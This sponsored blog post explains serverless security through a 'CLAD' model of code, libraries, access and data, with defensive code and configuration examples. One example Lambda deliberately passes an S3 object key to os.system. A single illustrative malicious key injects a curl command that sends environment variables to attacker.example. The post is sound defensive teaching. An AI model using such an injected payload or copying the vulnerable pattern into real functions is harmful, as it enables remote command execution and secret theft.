How to Achieve Ironclad Serverless Security
Snyk sponsored this post.
Serverless means different things to different people, so to align on terminology early: this post will focus on functions, such as AWS Lambda functions, Google Cloud Functions, or Azure Functions. Basically, the functions that run on top of a cloud that manages them for you, along with their VM operations, out of the box.
While this post will focus on the gaps, and provide practical takeaways of what you can actually do in order to improve your serverless security posture, let’s start off with the good news: serverless has inherent security advantages and was built to implicitly manage security by design. Some examples:
- Unpatched Operating Systems. Serverless basically removes any server wrangling — patching, upgrading, and such — since serverless servers (an oxymoron of sorts) are maintained and patched for you.
- DoS Attacks. Serverless scales elastically by nature and is designed to handle large volumes of traffic; and this is not limited to “good traffic” alone. “Bad traffic,” sent in an attempt to create a denial of service, also scales well on serverless. While you can still get DoSed, or receive a hefty bill as a result of a spike in traffic, it’s much more difficult to achieve a DoS attack against serverless.
- Long-Standing Compromised Servers. Serverless servers are inherently short-lived — meaning that if attackers want to gain access to your server, install an agent and do malicious activity, this is typically more difficult with servers that are torn down rapidly. Therefore they would need to plan a well-executed end-to-end attack in advance, which is harder and carries a higher risk of exposure.
With that said, there are still quite a few security aspects that need to be taken into account when choosing to use serverless technology. There are some good practices that you can apply to minimize these risks, which I call the CLAD Model.
The CLAD Model
- Code. Your function code, which may contain vulnerabilities.
- Libraries. Application dependencies (libraries pulled in through your application) that may contain vulnerabilities.
- Access. Configurations that enable excessive permissions or access to sensitive data or functions.
- Data. A different beast in serverless operations, since you take away the transient data that might otherwise live on a server.
Show Me the Code
Code is at the heart of serverless, so let’s start by checking out an example (taken from OWASP).
This code example is a Lambda function in Python that simulates an e-commerce store: it updates a file in S3, amending it to record the date when an order is fulfilled.
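The original listing isn’t reproduced here, but a minimal sketch of what such a function might look like follows; the function names and event shape are illustrative, and the boto3 download/upload calls are elided for brevity:

```python
import os

def build_fulfil_command(key):
    # The S3 object key is interpolated directly into a shell command.
    # This string formatting is the injection point discussed below.
    download_path = "/tmp/{}".format(key)
    return "echo fulfilled $(date) >> {}".format(download_path)

def handler(event, context):
    # Triggered by an S3 object-created notification (standard event shape).
    key = event["Records"][0]["s3"]["object"]["key"]
    # The real function would first download the object, amend it, and
    # upload it back to S3; those calls are elided here for brevity.
    os.system(build_fulfil_command(key))
```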
Let’s zoom in on the scariest bit of this simple piece of code. If you were looking closely, you probably noticed the line of code that contains os.system, a function near which, oftentimes, “there be dragons” (i.e. proceed with caution). That is indeed the case here as well.
However, the real security breach actually happens a few lines up.
We’re used to referring to S3 “files,” but S3 entries are actually objects, and an object key can contain any UTF-8 character, including a semicolon (;).
With this possible, when os.system is later called, the curly braces are replaced with the download path, which embeds the attacker-controlled key, potentially allowing remote command execution. If the payload were to look like this:
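An illustrative, purely hypothetical malicious object key might be:

```
fulfilled_order.txt; curl -s -X POST --data "$(env)" https://attacker.example/
```

Everything after the semicolon runs as its own shell command once the key is interpolated into the os.system string.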
…that can end up executing attacker-controlled commands, for instance sending sensitive data off to a malicious server.
Key Takeaway #1
There’s really nothing in serverless to protect you against such an attack (although this can, of course, happen in non-serverless operations as well).
The important thing to note here is that the mistake was not trusting HTTP input; it was trusting the familiar-looking S3 file name, which is a very common mistake in the world of serverless.
As a general trend, we have learned to be cautious with HTTP traffic. But when thinking about functions in the context of security, a best practice is to treat each function as its own perimeter. This function’s code assumes that the S3 bucket itself is safe and that an attacker cannot create files within it; it shouldn’t have made that assumption.
What You Can Do About It:
Validate that each function is secure on its own, even if the functions around it are not ironclad, because the essence of serverless is that it is made up of blocks that you can move around, and even combine in different ways.
- Secure your code, and beware of event inputs: not just HTTP, but also SNS messages, S3 file names, and objects.
- Treat every function as a perimeter.
- Use shared libraries for scale. It’s not practical or realistic to think that developers will be able to do this for every function, so a best practice would be to create shared, sanitized libraries.
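As a sketch of that last point, here is what a tiny shared sanitization helper might look like. The allowlist pattern and function names are illustrative assumptions, not a complete solution:

```python
import re
import shlex

# Illustrative allowlist: tighten or relax it to match the object keys
# your application actually produces.
ALLOWED_KEY = re.compile(r"[A-Za-z0-9._/-]+\Z")

def safe_s3_key(key):
    """Raise if an S3 object key contains anything outside the allowlist."""
    if not ALLOWED_KEY.match(key):
        raise ValueError("unexpected character in S3 object key: {!r}".format(key))
    return key

def safe_shell_arg(value):
    # Better still: avoid the shell entirely (subprocess with an argument
    # list). If you must build a command string, quote every input.
    return shlex.quote(value)
```

A shared library like this lets every function apply the same input checks without each developer re-deriving them.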
The Libraries: Beware of Zero-Days in Stale Dependencies
Libraries are essentially the “sprinkles” of infrastructure in your application code. While we usually think of serverless as code-only, these libraries bring infrastructure into your application: just like an operating system or server might run an unpatched service (e.g. NGINX), a function might carry an unpatched expressjs or other library. And the numbers might surprise you.
Dependencies in Serverless Functions
*(Table: median number of direct dependencies per serverless function, by language.)*
Based on the Snyk vulnerability database, these are the median numbers of direct dependencies that serverless functions have in Snyk-scanned projects — and they’re pretty substantial. Where the plot thickens is in the dependencies within the components that these projects use.
*(Table: median number of direct and total dependencies per serverless function, by language.)*
When we look at these numbers, the total number of dependencies is dramatically higher, by one or more orders of magnitude. With such a significant number of components, many can have vulnerabilities or go stale, with new vulnerabilities discovered in older, unmaintained versions.
*(Table: direct and total dependencies per serverless function, plus the number of zero-day vulnerabilities disclosed in the last 12 months, by language.)*
In this final snapshot, focusing on these four ecosystems alone, you can see the number of zero-day vulnerabilities disclosed in just the last 12 months. Even with back-of-the-napkin math, when you multiply many functions by their many libraries and those libraries’ vulnerabilities, the odds of having some significant “holes in your fence” (i.e. ways for attackers to walk right in) are pretty high. This is the infrastructure-like risk you need to tackle.
What You Can Do About It:
First, you need to know what you have. Start with an inventory, noting which components are used by which function. Snyk, for example, can do this directly on the Lambda functions (or through a GitHub repo), but this should be done even if you’re not using Snyk: track new vulnerabilities within the components your functions use, particularly those running in production.
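As a minimal, tool-agnostic sketch of the inventory step, using only the Python standard library, you could enumerate what a function’s environment actually ships:

```python
from importlib import metadata

def installed_inventory():
    """Map each installed distribution in this environment to its version.

    A crude, environment-level inventory of what a Python function
    actually ships; feed the result into the vulnerability tracker of
    your choice.
    """
    return {dist.metadata["Name"]: dist.version
            for dist in metadata.distributions()}
```

The exact tooling is up to you; the point is to have the per-function component list before a zero-day lands, not after.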
Second, you need to invest in remediation. The reality is that you will receive these alerts often, since new vulnerabilities are disclosed all the time. So you want to ensure that the remediation path is easy, typically through an upgrade, and roll it out as quickly as possible.
- Find, track, and fix vulnerable libraries.
- Streamline and automate remediation.
- Keep your inventory current over time, and be ready to fix zero-days as quickly as possible.
Access: What Your Functions Can Do vs. What They Should Do
While serverless functions are very powerful, they should be granted the minimum access needed to do their job well.
In serverless, you often see the following pattern (which is of course not exclusive to serverless; it happens in every ecosystem): a single YAML file defines multiple functions, which makes sense, as they are all deployed together. Generally, there are different considerations for whether this is a good or bad practice, but it’s common. Note, however, that at the top of the file sit the permissions: the set of IAM roles and what they are allowed to do.
Putting all of these into one file, while convenient, actually gives each function a superset of the permissions it needs. Permissions are easy to give, and hard to contract. After giving permissions, it becomes very scary to revoke them, because it’s hard to know what may break. So the reality is: they never contract, they just expand and expand (until someone adds an asterisk).
So you should really invest in shrinking these privileges by having the right policies in place from the get-go. While a single shared policy is the easier way to go, investing in more granular, function-specific policies is safer, and once you do this well, you will be far better off.
With monoliths, where a single app has all of these functions rolled into one, the platforms don’t allow you to apply different policies to different pieces of code. Serverless functions DO allow you to do this, so you are encouraged to take advantage of this built-in security benefit.
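To make the contrast concrete, here is a hypothetical Serverless Framework serverless.yml sketch (function names, table names, and account IDs are invented): the provider-level role grants every function a superset of permissions, while the per-function form (here via the community serverless-iam-roles-per-function plugin) scopes each function down:

```yaml
# Antipattern: one provider-level role shared by every function in the file.
provider:
  name: aws
  runtime: python3.9
  iam:
    role:
      statements:
        - Effect: Allow
          Action: ["dynamodb:*", "s3:*"]  # superset of what any one function needs
          Resource: "*"

# Safer: per-function roles, e.g. with serverless-iam-roles-per-function.
plugins:
  - serverless-iam-roles-per-function

functions:
  getOrder:
    handler: handler.get_order
    iamRoleStatements:
      - Effect: Allow
        Action: ["dynamodb:GetItem"]  # only what this function actually does
        Resource: "arn:aws:dynamodb:us-east-1:123456789012:table/orders"
```

The per-function version takes more keystrokes, but each function’s blast radius now matches what it actually does.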
What You Can Do About It:
- Give each function minimal permissions, even if it’s harder.
- Isolate experiments from production. While it’s easy to rapidly deploy functions as experiments, the code or libraries may (as noted before) contain vulnerabilities, and experimental code goes stale, making this a risky practice. Production functions presumably get the care and maintenance they require; anything experimental that will not receive the same level of attention should be segregated from the more secure surroundings and from customer data.
- Track unused permissions and reduce them. If you would like to level up and actually improve your system over time, track unused permissions and remove them gradually. You can do this through logs, or even chaos engineering: remove a permission and be ready for what happens. Building this competency enables you to increase the security of your functions and application over time.
Data: Input and Output into Your Functions
At the end of the day, applications are typically just processing data: some piece of logic takes data in and outputs other data, and serverless is no different. Your functions just process data, and they need to do it well. However, with serverless there is the added concern that you’ve lost the ability to store transient data, such as session or log data, that you might have temporarily put on the machine or held in memory in typical non-serverless operations.
The result is that much more data gets stored outside the function, possibly in some datastore or cache (e.g. Redis), and you need to be mindful of how you secure that data. Just as with the function’s perimeter we discussed, you don’t know who has access to that data. See the example below (again using Snyk, but various solutions can do this):
In this code, we’re inspecting the Terraform script that deploys a serverless function. Logging is enabled outside the function (which makes sense, as you don’t want to store log data on a short-lived, immutable server), but encryption was not enabled. Encryption is, in this case, only a recommendation; yet when logs are not encrypted at rest, it’s unknown who has access to them.
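A hypothetical Terraform fragment of the kind being described: a CloudWatch log group for the function where retention is configured but no kms_key_id is set, leaving the logs unencrypted at rest:

```hcl
resource "aws_cloudwatch_log_group" "fn_logs" {
  name              = "/aws/lambda/orders"
  retention_in_days = 14

  # kms_key_id is omitted, so these logs are not encrypted at rest with a
  # customer-managed key, which is exactly the condition the scan flags.
  # kms_key_id = aws_kms_key.logs.arn
}
```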
Don’t forget that data is important, and serverless does not make your data concerns magically go away.
What You Can Do About It:
- Keep secrets away from code, in secure storage (e.g. KMS, or at least environment variables). This may add some complexity, since serverless is extremely “easy”: it becomes tempting to just check some key into your code repository. But I can’t stress this enough: don’t do it. Such keys are easy to steal and hard to rotate.
- Secure data in transit. When data moves between network entities, make sure you secure it, especially when you call third-party components or read data back. Because it’s not all on the same machine, you cannot trust the channels these functions communicate over, and leaving them unsecured creates fragility in your systems.
- Purge and encrypt transient/session data. There will be more of it, due to the lack of state. If, in non-serverless setups, you were used to simply keeping transient data in cache or memory, with serverless you should consider encrypting it, and purging it when it’s no longer needed.
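A minimal sketch of the first point, assuming an environment variable populated out-of-band; the variable name is illustrative:

```python
import os

def get_api_key():
    """Fetch a secret from the environment instead of from source code.

    "API_KEY" is an illustrative name; in practice the variable would be
    populated at deploy time from a secrets manager (e.g. a KMS-decrypted
    value) and never checked into the repository.
    """
    key = os.environ.get("API_KEY")
    if not key:
        raise RuntimeError("API_KEY is not configured")
    return key
```

Failing loudly when the secret is missing is deliberate: a function should refuse to run misconfigured rather than fall back to a hardcoded value.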
Wrapping up: Building for Scale with DevSecOps as a Backbone
Serverless implicitly provides security mechanisms; however, you are left to handle the Code, Libraries, Access, and Data yourself.
Serverless is built for scale, and while today you may have a manageable number of functions whose security you can manually audit and survey, this of course does not scale. Therefore, it’s important to invest in automation and observability early, in order to avoid waking up to a disaster tomorrow. It’s recommended to build in security practices from the ground up, and to stay aware of the functions you have, the security status of their components, and their permissions, so you get ahead of the security curve instead of finding yourself having to untangle a mess.
At a higher level than the technology, serverless is essentially about speed: being able to rapidly deploy functions, which are small units that work with good APIs. There’s almost no opportunity or time for an external security team to be included in the deployment process. That’s why the only real way to scale is through the DevSecOps approach, whose core is empowering developers by giving them the tools, ownership, and mandate to secure what they are building. The security team’s job is then to help developers do this better and better, more easily and with less friction, and to make sure that they actually implement the recommended security practices.
The CLAD model scales security beyond serverless. It is applicable to all cloud native development, and should be considered essential in modern engineering practices.
You can find more serverless exploit examples and practical code examples in this serverless-goof repo.
Feature image via Pixabay.